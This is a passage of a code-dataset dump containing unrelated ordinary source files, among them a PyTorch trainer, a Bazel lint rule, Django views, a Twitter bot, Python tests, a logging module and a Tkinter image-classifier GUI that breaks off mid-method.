origin_pos.unsqueeze(2)).repeat(1, duplicate, 1).view(-1)\n neg_sim = torch.bmm(reconstructed_pos.repeat(\n 1, duplicate).view(-1, hid_size).unsqueeze(1), origin_neg.unsqueeze(2)).view(-1)\n diff = neg_sim - pos_sim + 1\n\n diff = torch.max(diff, torch.zeros_like(diff))\n loss = torch.sum(diff)\n return loss\n\n\nclass CORALTrainer:\n \"\"\"\n CORALTrainer\n \"\"\"\n\n def __init__(self, bert: BERT,\n train_dataloader: DataLoader, test_dataloader: DataLoader,\n lr: float = 1e-4,\n with_cuda: bool = True, cuda_devices=None, log_freq: int = 10, loss_lambda=1, model_path=None, n_topics=50, hinge_loss_start_point=20, entropy_start_point=30):\n \"\"\"\n :param bert: code representation encoder\n :param train_dataloader: train dataset data loader\n :param test_dataloader: test dataset data loader [can be None]\n :param lr: learning rate of optimizer\n :param with_cuda: traning with cuda\n :param log_freq: logging frequency of the batch iteration\n \"\"\"\n\n # Setup cuda device for CORAL training, argument -c, --cuda should be true\n self.loss_lambda = loss_lambda\n self.n_topics = n_topics\n\n self.hinge_loss_start_point = hinge_loss_start_point\n self.entropy_start_point = entropy_start_point\n cuda_condition = torch.cuda.is_available() and with_cuda\n\n self.device = torch.device(\"cuda:0\" if cuda_condition else \"cpu\")\n\n self.bert = bert\n self.model = CORAL(bert, n_topics=n_topics).to(self.device)\n\n print(model_path)\n if model_path:\n state_dict = torch.load(model_path)[\"model_state_dict\"]\n\n model_dict = self.model.state_dict()\n model_dict.update(state_dict)\n self.model.load_state_dict(state_dict)\n\n # Setting the train and test data loader\n self.train_data = train_dataloader\n self.test_data = test_dataloader\n\n # Setting the SGD optimizer with hyper-param\n self.optim = SGD(self.model.parameters(), lr=lr, momentum=0.9)\n\n # Using Cross Entropy Loss function for weak supervision\n self.best_loss = None\n self.updated = False\n self.log_freq = log_freq\n self.cross_entropy = nn.CrossEntropyLoss(ignore_index=0)\n\n print(\"Total Parameters:\", sum([p.nelement()\n for p in self.model.parameters()]))\n\n def train(self, epoch):\n self.model.train()\n return self.iteration(epoch, self.train_data)\n\n def test(self, epoch):\n self.model.eval()\n with torch.no_grad():\n loss = self.iteration(epoch, self.test_data, train=False)\n return loss\n\n def api(self, data_loader=None):\n self.model.eval()\n\n if not data_loader:\n data_loader = self.test_data\n\n # Setting the tqdm progress bar\n data_iter = tqdm.tqdm(enumerate(data_loader),\n total=len(data_loader),\n bar_format=\"{l_bar}{r_bar}\")\n\n stages = []\n stage_vecs = []\n with torch.no_grad():\n for i, item in data_iter:\n data = item[0]\n ndata = item[1]\n data = {key: value.to(self.device)\n for key, value in data.items()}\n ndata = {key: value.to(self.device)\n for key, value in ndata.items()}\n\n data = {key: value.to(self.device)\n for key, value in data.items()}\n ndata = {key: value.to(self.device)\n for key, value in ndata.items()}\n\n reconstructed_vec, graph_vec, origin_neg, topic_dist, stage_vec = self.model.forward(\n data[\"bert_input\"], ndata[\"bert_input\"], data[\"segment_label\"], ndata[\"segment_label\"], data[\"adj_mat\"], ndata[\"adj_mat\"])\n\n stages += torch.max(stage_vec, 1)[-1].tolist()\n stage_vecs += stage_vec.tolist()\n\n return stages, stage_vecs\n\n def iteration(self, epoch, data_loader, train=True):\n \"\"\"\n loop over the data_loader for training or testing\n if on train status, backward operation is activated\n and also auto save the model every peoch\n\n :param epoch: current epoch index\n :param data_loader: torch.utils.data.DataLoader for iteration\n :param train: boolean value of is train or test\n :return: average loss\n \"\"\"\n str_code = \"train\" if train else \"test\"\n\n # Setting the tqdm progress bar\n data_iter = tqdm.tqdm(enumerate(data_loader),\n desc=\"EP_%s:%d\" % (str_code, epoch),\n total=len(data_loader),\n bar_format=\"{l_bar}{r_bar}\")\n\n avg_loss = 0.0\n\n for i, item in data_iter:\n\n data = item[0]\n ndata = item[1]\n\n data = {key: value.to(self.device) for key, value in data.items()}\n ndata = {key: value.to(self.device)\n for key, value in ndata.items()}\n\n reconstructed_vec, graph_vec, origin_neg, topic_dist, stage_vec = self.model.forward(\n data[\"bert_input\"], ndata[\"bert_input\"], data[\"segment_label\"], ndata[\"segment_label\"], data[\"adj_mat\"], ndata[\"adj_mat\"])\n\n bs, _ = reconstructed_vec.shape\n nbs, _ = origin_neg.shape\n duplicate = int(nbs / bs)\n\n hinge_loss = my_loss(reconstructed_vec, graph_vec, origin_neg)\n weight_loss = torch.norm(torch.mm(\n self.model.reconstruction.weight.T, self.model.reconstruction.weight) - torch.eye(self.n_topics).cuda())\n c_entropy = self.cross_entropy(stage_vec, data['stage'])\n entropy = -1 * (F.softmax(stage_vec, dim=1) *\n F.log_softmax(stage_vec, dim=1)).sum()\n\n if epoch < self.hinge_loss_start_point:\n loss = c_entropy\n\n elif epoch < self.entropy_start_point:\n loss = c_entropy + self.loss_lambda * weight_loss + hinge_loss\n else:\n loss = c_entropy + entropy + self.loss_lambda * weight_loss + hinge_loss\n\n if epoch == self.hinge_loss_start_point:\n self.optim = SGD(self.model.parameters(),\n lr=0.00001, momentum=0.9)\n\n if train:\n self.optim.zero_grad()\n loss.backward()\n\n self.optim.step()\n\n avg_loss += loss.item()\n\n post_fix = {\n \"epoch\": epoch,\n \"iter\": i,\n \"avg_loss\": avg_loss / (i + 1),\n \"loss\": loss.item(),\n \"cross_entropy\": c_entropy.item(),\n \"entropy\": entropy.item(),\n \"hinge_loss\": hinge_loss.item()\n }\n\n if i % self.log_freq == 0:\n data_iter.write(str(post_fix))\n\n print(\"EP%d_%s, avg_loss=\" %\n (epoch, str_code), avg_loss / len(data_iter))\n return avg_loss / len(data_iter)\n\n def save(self, epoch, file_path=\"output/bert_trained.model\"):\n \"\"\"\n Saving the current BERT model on file_path\n\n :param epoch: current epoch number\n :param file_path: model output path which gonna be file_path+\"ep%d\" % epoch\n :return: final_output_path\n \"\"\"\n output_path = file_path + \".ep%d\" % epoch\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': self.model.state_dict()\n }, output_path)\n print(\"EP:%d Model Saved on:\" % epoch, output_path)\n\n return output_path\n","sub_path":"src/models/CORAL-LM/coral/trainer/coral_trainer.py","file_name":"coral_trainer.py","file_ext":"py","file_size_in_byte":8249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"564825195","text":"load(\"@bazel_skylib//lib:shell.bzl\", \"shell\")\nload(\"@bazel_skylib//lib:paths.bzl\", \"paths\")\nload(\"@io_bazel_rules_go//go:def.bzl\", \"GoSDK\")\n\ndef _gometalinter_impl(ctx):\n args = []\n if ctx.attr.config:\n args.append(\"--config=\" + ctx.file.config.short_path)\n else:\n args.append(\"--no-config\")\n args.extend(ctx.attr.paths)\n out_file = ctx.actions.declare_file(ctx.label.name + \".bash\")\n sdk = ctx.attr._go_sdk[GoSDK]\n substitutions = {\n \"@@GOMETALINTER_SHORT_PATH@@\": shell.quote(ctx.executable._gometalinter.short_path),\n \"@@ARGS@@\": shell.array_literal(args),\n \"@@PREFIX_DIR_PATH@@\": shell.quote(paths.dirname(ctx.attr.prefix)),\n \"@@PREFIX_BASE_NAME@@\": shell.quote(paths.basename(ctx.attr.prefix)),\n \"@@NEW_GOROOT@@\": shell.quote(sdk.root_file.dirname),\n }\n ctx.actions.expand_template(\n template = ctx.file._runner,\n output = out_file,\n substitutions = substitutions,\n is_executable = True,\n )\n transitive_depsets = [\n depset(sdk.srcs),\n depset(sdk.tools),\n ]\n default_runfiles = ctx.attr._gometalinter[DefaultInfo].default_runfiles\n if default_runfiles != None:\n transitive_depsets.append(default_runfiles.files)\n\n runfiles = ctx.runfiles(\n transitive_files = depset(transitive = transitive_depsets),\n )\n return [DefaultInfo(\n files = depset([out_file]),\n runfiles = runfiles,\n executable = out_file,\n )]\n\n_gometalinter = rule(\n implementation = _gometalinter_impl,\n attrs = {\n \"config\": attr.label(\n allow_single_file = True,\n doc = \"Configuration file to use\",\n ),\n \"paths\": attr.string_list(\n doc = \"Directories to lint. /... will recurse\",\n default = [\"./...\"],\n ),\n \"prefix\": attr.string(\n mandatory = True,\n doc = \"Go import path of this project i.e. where in GOPATH you would put it. E.g. github.com/atlassian/bazel-tools\",\n ),\n \"_gometalinter\": attr.label(\n default = \"@com_github_atlassian_bazel_tools_gometalinter//:linter\",\n cfg = \"host\",\n executable = True,\n ),\n \"_runner\": attr.label(\n default = \"@com_github_atlassian_bazel_tools//gometalinter:runner.bash.template\",\n allow_single_file = True,\n ),\n \"_go_sdk\": attr.label(\n providers = [GoSDK],\n default = \"@go_sdk//:go_sdk\",\n ),\n },\n executable = True,\n)\n\ndef gometalinter(**kwargs):\n tags = kwargs.get(\"tags\", [])\n if \"manual\" not in tags:\n tags.append(\"manual\")\n kwargs[\"tags\"] = tags\n _gometalinter(\n **kwargs\n )\n","sub_path":"gometalinter/def.bzl","file_name":"def.bzl","file_ext":"bzl","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"294850231","text":"from django.shortcuts import render\n\n# Create your views here.\n\nfrom .models import my_ch\n\ndef numbers(request, num):\n ans = []\n for i in my_ch.objects.all():\n if i<= num:\n ans.append(i.numb)\n else:\n break\n return render(request,'prost/index.html',{'ans': ans})\n","sub_path":"mysite/prost/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"287071332","text":"from django.shortcuts import render, get_list_or_404, get_object_or_404, redirect\nfrom rb.models import Receita\n\ndef busca(request):\n \n busca_receitas = Receita.objects.order_by('-date_receita').filter(publicada=True)\n \n if 'buscar' in request.GET:\n nome_a_buscar = request.GET['buscar']\n busca_receitas = busca_receitas.filter(nome_receita__icontains=nome_a_buscar)\n \n dados = {\n 'receitas' : busca_receitas\n }\n \n return render(request, 'receitas/buscar.html', dados)\n","sub_path":"apps/rb/views/busca.py","file_name":"busca.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"609373372","text":"#!/usr/bin/python\n\n\"\"\"\nShared memory segments\n\"\"\"\n\nimport sys\nimport lib_common\nfrom lib_properties import pc\nfrom sources_types import CIM_Process\n\ndef Main():\n\tcgiEnv = lib_common.CgiEnv()\n\tpid = int( cgiEnv.GetId() )\n\n\tgrph = cgiEnv.GetGraph()\n\n\tproc_obj = CIM_Process.PsutilGetProcObj(pid)\n\n\tnodeProcess = lib_common.gUriGen.PidUri(pid)\n\n\ttry:\n\t\tall_maps = CIM_Process.PsutilProcMemmaps(proc_obj)\n\texcept:\n\t\texc = sys.exc_info()[1]\n\t\tlib_common.ErrorMessageHtml(\"get_memory_maps Pid=%d. Caught %s\\n\" % (pid,str(exc)) )\n\n\tpropMemoryRSS = lib_common.MakeProp(\"Resident Set Size\")\n\tfor map in all_maps:\n\t\t# This, because all Windows paths are \"standardized\" by us.\n\t\tcleanMapPath = map.path.replace(\"\\\\\",\"/\")\n\n\t\turiMemMap = lib_common.gUriGen.MemMapUri( cleanMapPath )\n\n\t\tgrph.add( ( uriMemMap, propMemoryRSS, lib_common.NodeLiteral(map.rss) ) )\n\t\tgrph.add( ( nodeProcess, pc.property_memmap, uriMemMap ) )\n\n\tcgiEnv.OutCgiRdf( \"LAYOUT_SPLINE\")\n\nif __name__ == '__main__':\n\tMain()\n\n","sub_path":"survol/sources_types/CIM_Process/process_memmaps.py","file_name":"process_memmaps.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458921400","text":"#! /usr/bin/env python\n\nimport datetime\nimport sys\nimport time\nimport tweepy\n\n# connect to api\nconsumer_key = \"xxx\"\nconsumer_secret = \"xxx\"\naccess_key = \"xxx\"\naccess_secret = \"xxx\"\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret, callback = None)\nauth.set_access_token(access_key, access_secret)\napi = tweepy.API(auth)\n\n# pull id of latest dm\nf = open(\"latest_dm_id.txt\", \"r+\")\nlatest_dm_id = int(f.read())\nf.close()\n\n# change this from an infinited loop to a chronjob\nwhile True:\n\n # create empty list to insert tweets\n dms_to_tweet = []\n\n # create buffer variable\n buffer = 60\n\n # pull data of most recent ansiblebot tweet\n most_recent_tweet = api.home_timeline(count=1)[0]\n\n # alert user api was called\n print(\"Called api.home_timeline().\")\n\n # append each tweet object on the first page of dms to dms_to_tweet\n for dm in (api.direct_messages(since_id=most_recent_tweet.id, page=1)[::-1]):\n dms_to_tweet.append(dm)\n\n # alert user api was called again\n print(\"Called api.direct_messages().\")\n\n # open tweet log file to store information\n tweet_log = open(\"tweet_log.txt\", \"a\")\n\n # also open list of users to store information\n user_lst = open(\"user_lst.txt\", \"r+\")\n\n # main tweet loop -- run the following code on each of the dms to tweet\n for dm in dms_to_tweet:\n\n\t# tweet the text of the current dm object\n api.update_status(dm.text)\n\n # learn how to decode from byte (emoji) to string\n tweet = dm.text\n\n\t# attempt to store tweet information into variable for logging\n try:\n log = \"@\" + dm.sender_screen_name + \":\\n\" + \"\\\"\" + tweet + \\\n \"\\\"\\n\" + \"at \" + str(datetime.datetime.now()) + \"\\n\\n\"\n tweet_log.write(log)\n except UnicodeEncodeError:\n\t # alert user bot could not decode tweet\n print(\"Could not log tweet without decoding to UTF-8.\")\n\t # if cannot decode, notify in tweet log\n tweet_log.write(\"@\" + dm.sender_screen_name + \" tweeted using emojis. Could not decode.\\n\\n\")\n\n\t# alert user bot has tweeted\n print(\"\\nTweeted \\\"\" + tweet + \"\\\" from \" + dm.sender_screen_name + \\\n \" at \" + str(datetime.datetime.now()) + \".\\n\")\n\n\t# if new tweeter, log to user_lst.txt\n if (\"@\" + dm.sender_screen_name + \"\\n\") not in user_lst.readlines():\n user_lst.write(\"@\" + dm.sender_screen_name + \"\\n\")\n print(\"Appended @\" + dm.sender_screen_name + \" to user_lst.txt.\")\n\t# otherwise, don't, and alert user\n else:\n print(\"@\" + dm.sender_screen_name + \" is already in user_lst.txt.\")\n\n\t# adjust buffer\n if buffer > 0:\n buffer -= 5\n\n\t# wait 5 seconds\n time.sleep(5)\n\n # close opened files\n tweet_log.close()\n user_lst.close()\n\n # log latest tweet id for next use\n f = open(\"latest_dm_id.txt\", \"r+\")\n f.seek(0)\n f.write(str(most_recent_tweet.id))\n f.close()\n\n # alert user tweets have been successful and wait\n print(\"Success. Gathering messages for the next \" + str(buffer) + \" seconds....\")\n time.sleep(buffer)\n","sub_path":"ansiblebot.py","file_name":"ansiblebot.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"548240197","text":"from aiogram import Dispatcher\nfrom aiogram.types import ContentType, Message\n\n\nasync def edited_message_warning(message: Message):\n \"\"\"\n Хэндлер на редактирование сообщений.\n В настоящий момент реакция на редактирование с любой стороны одна: уведомлять о невозможности\n изменить нужное сообщение на стороне получателя.\n\n :param message: отредактированное пользователем или админом сообщение\n \"\"\"\n await message.reply(\"К сожалению, редактирование сообщения не будет видно принимающей стороне. \"\n \"Рекомендую просто отправить новое сообщение.\")\n\n\ndef register_common_handlers(dp: Dispatcher):\n dp.register_edited_message_handler(edited_message_warning, content_types=ContentType.ANY)\n","sub_path":"bot/handlers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"328609654","text":"\"\"\"empty message\n\nRevision ID: 36e7b0be9a01\nRevises: 8d476971c377\nCreate Date: 2018-11-11 21:03:50.903279\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '36e7b0be9a01'\ndown_revision = '8d476971c377'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('SKU', sa.Column('storage_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'SKU', 'storage', ['storage_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'SKU', type_='foreignkey')\n op.drop_column('SKU', 'storage_id')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/36e7b0be9a01_.py","file_name":"36e7b0be9a01_.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"40079265","text":"import responses\n\nfrom tests.util import random_str\nfrom tests.util import mock_http_response\nfrom binance.spot import Spot as Client\n\nmock_item = {\"key_1\": \"value_1\", \"key_2\": \"value_2\"}\n\nkey = random_str()\nsecret = random_str()\n\n\n@mock_http_response(\n responses.GET, \"/sapi/v1/sub-account/status\\\\?email=alice@test.com\", mock_item, 200\n)\ndef test_sub_account_asset():\n \"\"\"Tests the API endpoint to get sub account asset\"\"\"\n\n client = Client(key, secret)\n response = client.sub_account_status(email=\"alice@test.com\")\n response.should.equal(mock_item)\n","sub_path":"tests/spot/corporate/test_sub_account_status.py","file_name":"test_sub_account_status.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"266492088","text":"\"\"\"Tests of the phasing code for calculating UVWs.\"\"\"\nimport pytest\n\nimport numpy as np\nfrom astropy import units as un\nfrom astropy.coordinates import EarthLocation, SkyCoord\nfrom astropy.time import Time\nfrom pyuvdata import utils as uvutils\n\nfrom py21cmsense._utils import phase_past_zenith\n\n\n@pytest.mark.parametrize(\"lat\", [-1.0, -0.5, 0, 0.5, 1.0])\n@pytest.mark.parametrize(\"use_apparent\", [True, False])\ndef test_phase_at_zenith(lat, use_apparent):\n bls_enu = np.array(\n [\n [1, 0, 0],\n [0, 1, 0],\n ]\n )\n\n uvws = phase_past_zenith(\n time_past_zenith=0.0 * un.day,\n bls_enu=bls_enu,\n latitude=lat * un.rad,\n use_apparent=use_apparent,\n )\n\n assert np.allclose(np.squeeze(uvws), bls_enu, atol=5e-3)\n\n\n@pytest.mark.parametrize(\"use_apparent\", [True, False])\ndef test_phase_past_zenith(use_apparent):\n bls_enu = np.array(\n [\n [1, 0, 0],\n [0, 1, 0],\n ]\n )\n\n # Almost rotated to the horizon.\n uvws = np.squeeze(\n phase_past_zenith(\n time_past_zenith=0.2 * un.day,\n bls_enu=bls_enu,\n latitude=0 * un.rad,\n use_apparent=use_apparent,\n )\n )\n\n assert uvws[0][0] < 0.35 # Much foreshortened\n assert np.isclose(uvws[1][1], 1) # N-S direction doesn't get foreshortened.\n\n\ndef test_phase_past_zenith_shape():\n bls_enu = np.array(\n [\n [1, 0, 0],\n [0, 1, 0],\n [1, 0, 0],\n [0, 10, 0],\n [10, 0, 0],\n ]\n )\n\n times = np.array([0, 0.1, 0, 0.1]) * un.day\n\n # Almost rotated to the horizon.\n uvws = phase_past_zenith(\n time_past_zenith=times, bls_enu=bls_enu, latitude=0 * un.rad\n )\n\n assert uvws.shape == (5, 4, 3)\n assert np.allclose(uvws[0], uvws[2]) # Same baselines\n assert np.allclose(uvws[:, 0], uvws[:, 2]) # Same times\n assert np.allclose(uvws[:, 1], uvws[:, 3]) # Same times\n\n\n@pytest.mark.parametrize(\"lat\", [-1.0, -0.5, 0, 0.5, 1.0])\ndef test_use_apparent(lat):\n bls_enu = np.array(\n [\n [1, 0, 0],\n [0, 1, 0],\n ]\n )\n\n times = np.linspace(-1, 1, 3) * un.hour\n\n # Almost rotated to the horizon.\n uvws = phase_past_zenith(\n time_past_zenith=times, bls_enu=bls_enu, latitude=lat * un.rad\n )\n uvws0 = phase_past_zenith(\n time_past_zenith=times,\n bls_enu=bls_enu,\n latitude=lat * un.rad,\n use_apparent=True,\n )\n\n np.testing.assert_allclose(uvws, uvws0, atol=1e-2)\n\n\n@pytest.mark.parametrize(\"lat\", [-1.0, -0.5, 0, 0.5, 1.0])\n@pytest.mark.parametrize(\"time_past_zenith\", [-1 * un.hour, 0 * un.hour, 1 * un.hour])\ndef test_calc_app_coords(lat, time_past_zenith):\n # Generate ra/dec of zenith at time in the phase_frame coordinate system\n # to use for phasing\n telescope_location = EarthLocation.from_geodetic(lon=0, lat=lat * un.rad)\n\n # JD is arbitrary\n jd = 2454600\n\n zenith_coord = SkyCoord(\n alt=90 * un.deg,\n az=0 * un.deg,\n obstime=Time(jd, format=\"jd\"),\n frame=\"altaz\",\n location=telescope_location,\n )\n zenith_coord = zenith_coord.transform_to(\"icrs\")\n\n obstime = zenith_coord.obstime + time_past_zenith\n\n ra = zenith_coord.ra.to_value(\"rad\")\n dec = zenith_coord.dec.to_value(\"rad\")\n app_ra, app_dec = uvutils.calc_app_coords(\n ra, dec, time_array=obstime.utc.jd, telescope_loc=telescope_location\n )\n\n assert np.isclose(app_ra, ra, atol=0.02) # give it 1 degree wiggle room.\n assert np.isclose(app_dec, dec, atol=0.02)\n","sub_path":"tests/test_uvw.py","file_name":"test_uvw.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"265279829","text":"\"\"\"Typical usage: at the top of your file:\n\nLOGGER = Log.logger(__name__)\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nimport logging.config\nimport sys\nimport traceback\n\nDEBUG = False\nSTACK_TRACES = False\n\nLOG_LEVEL = 'INFO'\n\nDEFAULT_FORMAT = '%(message)s'\nDEBUG_FORMAT = '%(message)s'\n# DEBUG_FORMAT = '%(levelname)s: %(message)s'\nFILE_FORMAT = '%(asctime)s %(levelname)s: %(name)s: %(message)s'\n\n_LOG_SIGNATURE = 'util/Log.py'\n_ERROR_COUNTER = {}\n\ndef _check_error_count(limit, every):\n for line in traceback.format_stack():\n if _LOG_SIGNATURE not in line:\n errors = _ERROR_COUNTER.get(line, 0)\n if limit is not None and errors >= limit * (every or 1):\n return False\n _ERROR_COUNTER[line] = errors + 1\n return not (every and (errors % every))\n\n\nclass ConfigSetter(object):\n def config_update(self, get):\n self.debug = DEBUG or (get and get('debug'))\n self.stack_traces = STACK_TRACES or self.debug or (\n get and get('diagnostics', 'stack_traces'))\n self.log_level = (get and get('logging','level').upper()) or LOG_LEVEL\n\n self.kwds = {u'level': getattr(logging, self.log_level)}\n self.filename = get and get('logging', 'file')\n if self.filename:\n self.kwds[u'filename'] = self.filename\n else:\n self.kwds[u'stream'] = sys.stdout\n\n self.kwds[u'format'] = (get and get('logging', 'format')) or (\n FILE_FORMAT if self.filename else\n DEBUG_FORMAT if self.debug\n else DEFAULT_FORMAT)\n\n logging.basicConfig(**self.kwds)\n\n\nCONFIG = ConfigSetter()\ntry:\n from echomesh.base import Config\n Config.add_client(CONFIG)\nexcept:\n CONFIG.config_update(None)\n\n\ndef logger(name=None):\n assert name\n log = logging.getLogger(name or 'echomesh')\n original_error_logger = log.error\n\n def new_error_logger(*args, **kwds):\n limit = kwds.pop('limit', None)\n every = kwds.pop('every', None)\n raw = kwds.pop('raw', None)\n\n if limit is not None or limit is not None:\n if not _check_error_count(limit, every):\n return\n\n message, args = (args[0] if args else ''), args[1:]\n exc_type, exc_value = sys.exc_info()[:2]\n if exc_type and not raw:\n message = '%s %s' % (exc_value, message)\n kwds['exc_info'] = kwds.get('exc_info', CONFIG.stack_traces)\n if not CONFIG.filename:\n message = 'ERROR: %s\\n' % message\n original_error_logger(message, *args, **kwds)\n\n log.error = new_error_logger\n return log\n\nLOGGER = logger(__name__)\nLOGGER.debug('Log level is %s', CONFIG.log_level)\n\n","sub_path":"code/python/echomesh/util/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"378091741","text":"from tkinter import *\nfrom tkinter import ttk, filedialog, messagebox\n# Tk, Label, Button, filedialog, messagebox, Canvas\n# import matplotlib as mp\nfrom os import listdir\nfrom PIL import ImageTk, Image\n\n\nclass GUI:\n def __init__(self, master):\n\n # Variables\n self.imageNameMsg = StringVar()\n self.entryFolderName = StringVar()\n self.entryResultName = StringVar()\n self.totalImgNumber = 0\n self.curImgNumber = 0\n self.imageList = []\n self.imageFolderDir = ''\n self.cancerResultList = []\n\n self.img = None\n self.img_label = None\n self.defaultImgDir = r\"C:/Users/IceFox/AI_core/Project/GUI/TestGUI01/40X/\"\n self.ImgDir = \"\"\n\n # GUI\n self.master = master\n self.master.resizable(width=FALSE, height=FALSE)\n self.master.title(\"Cancer Classifier\")\n\n # Frame\n self.frame = ttk.Frame(self.master, padding=(5, 5, 12, 0))\n self.frame.pack(fill=BOTH, expand=1)\n\n for row in range(9):\n self.frame.grid_rowconfigure(row, minsize=15)\n for column in range(6):\n self.frame.grid_columnconfigure(column, minsize=15)\n self.frame.grid_columnconfigure(0, minsize=200)\n\n # Title (maybe not needed?)\n self.labelTitle = Label(self.frame, text=\"Cancer Classifier v1.0\")\n self.labelTitle.grid(row=0, column=3, sticky=E)\n\n # dir entry & load\n self.labelFolder = Label(self.frame, text=\"Image Folder Dir:\")\n self.labelFolder.grid(row=1, column=0, sticky=E)\n self.entryFolder = Entry(self.frame, textvariable=self.entryFolderName)\n self.entryFolder.grid(row=1, column=1, columnspan=4, sticky=W + E)\n self.btnFolder = Button(self.frame, text=\"Load\", command=self.LoadFromDir)\n self.btnFolder.grid(row=1, column=5, sticky=W)\n self.btnFolder = Button(self.frame, text=\"DebugLoad\", command=self.LoadDir)\n self.btnFolder.grid(row=1, column=6, sticky=W)\n\n self.labelResult = Label(self.frame, text=\"Classification Result Dir:\")\n self.labelResult.grid(row=2, column=0, sticky=E)\n self.entryResultDir = Entry(self.frame, textvariable=self.entryResultName)\n self.entryResultDir.grid(row=2, column=1, columnspan=4, sticky=W + E)\n self.btnFolder = Button(self.frame, text=\"Save\", command=self.LoadDir)\n self.btnFolder.grid(row=2, column=5, sticky=W)\n\n # main panel for labeling\n self.labelFolder = Label(self.frame, text=\"Image in the folder:\")\n self.labelFolder.grid(row=3, column=0, sticky=S)\n lists = StringVar(value=self.imageList)\n self.imageListbox = Listbox(self.frame, listvariable=lists, height=5)\n self.imageListbox.grid(row=4, column=0, rowspan=5, sticky=(N, S, E, W))\n self.imageNameLabel = Label(self.frame, textvariable=self.imageNameMsg)\n self.imageNameLabel.grid(row=4, column=3, columnspan=3, sticky=W)\n\n # self.imageListbox.bind('<>', self.DisplaySelectedImageName)\n self.imageListbox.bind('', self.ListboxSelected)\n\n # canvas\n self.canvas = Canvas(self.frame, background='white')\n self.canvas.grid(row=5, column=3, rowspan=2, columnspan=3)\n\n '''\n self.btnAdd = Button(self.frame, text = \"Add\", command = self.DebugIncreaseList)\n self.btnAdd.grid(row = 11, column = 3, sticky=(N,S,E,W))\n\n self.btnUpdate = Button(self.frame, text = \"Update\", command = self.UpdateListboxImage)\n self.btnUpdate.grid(row = 11, column = 4, sticky=(N,S,E,W))\n\n self.btnUpdate = Button(self.frame, text = \"ImportFolder\", command = self.ImportFolder)\n self.btnUpdate.grid(row = 11, column = 5, sticky=(N,S,E,W))\n\n self.btnClose = Button(self.frame, text = \"Load\", command = master.quit)\n self.btnClose.grid(row = 11, column = 6, sticky=(N,S,E,W))\n '''\n self.ctrPanel = Frame(self.frame)\n self.ctrPanel.grid(row=7, column=2, columnspan=5, sticky=W + E)\n self.prevBtn = Button(self.ctrPanel, text='<< Prev', width=10, command=self.prevImage)\n self.prevBtn.pack(side=LEFT, padx=5, pady=3)\n self.nextBtn = Button(self.ctrPanel, text='Next >>', width=10, command=self.nextImage)\n self.nextBtn.pack(side=LEFT, padx=5, pady=3)\n self.progLabel = Label(self.ctrPanel, text=\"Progress: / \")\n self.progLabel.pack(side=LEFT, padx=5)\n self.tmpLabel = Label(self.ctrPanel, text=\"Go to Image No.\")\n self.tmpLabel.pack(side=LEFT, padx=5)\n self.idxEntry = Entry(self.ctrPanel, width=5)\n self.idxEntry.pack(side=LEFT)\n self.goBtn = Button(self.ctrPanel, text='Go', command=self.gotoImage)\n self.goBtn.pack(side=LEFT)\n\n self.classifyPanel = Frame(self.frame)\n self.classifyPanel.grid(row=9, column=2, columnspan=5, sticky=W + E)\n self.classifyBtn = Button(self.classifyPanel, text='Run Classification', width=25,\n command=self.classifySingleImage)\n self.classifyBtn.pack(side=LEFT, padx=5, pady=3)\n self.classifyAllBtn = Button(self.classifyPanel, text='Run Classification on All', width=30,\n command=self.classifyAllImages)\n self.classifyAllBtn.pack(side=LEFT, padx=5, pady=3)\n # self.progLabel = Label(self.ctrPanel, text = \"Progress: / \")\n # self.progLabel.pack(side = LEFT, padx = 5)\n # self.tmpLabel = Label(self.ctrPanel, text = \"Go to Image No.\")\n # self.tmpLabel.pack(side = LEFT, padx = 5)\n # self.idxEntry = Entry(self.ctrPanel, width = 5)\n # self.idxEntry.pack(side = LEFT)\n # self.goBtn = Button(self.ctrPanel, text = 'Go', command = self.gotoImage)\n # self.goBtn.pack(side = LEFT)\n\n def prevImage(self, event=None):\n print(\"previous image\")\n if self.curImgNumber > 0:\n self.curImgNumber -= 1\n self.imageListbox.see(self.curImgNumber)\n self.LoadImage(self.imageList[self.curImgNumber])\n\n def nextImage(self, event=None):\n print(\"next image\")\n if self.curImgNumber < self.totalImgNumber - 1:\n self.curImgNumber += 1\n self.imageListbox.see(self.curImgNumber)\n self.LoadImage(self.imageList[self.curImgNumber])\n\n def gotoImage(self):\n # print(\"goto image\")\n idx = int(self.idxEntry.get()) - 1\n if 0 <= idx and idx < self.totalImgNumber:\n self.curImgNumber = idx\n 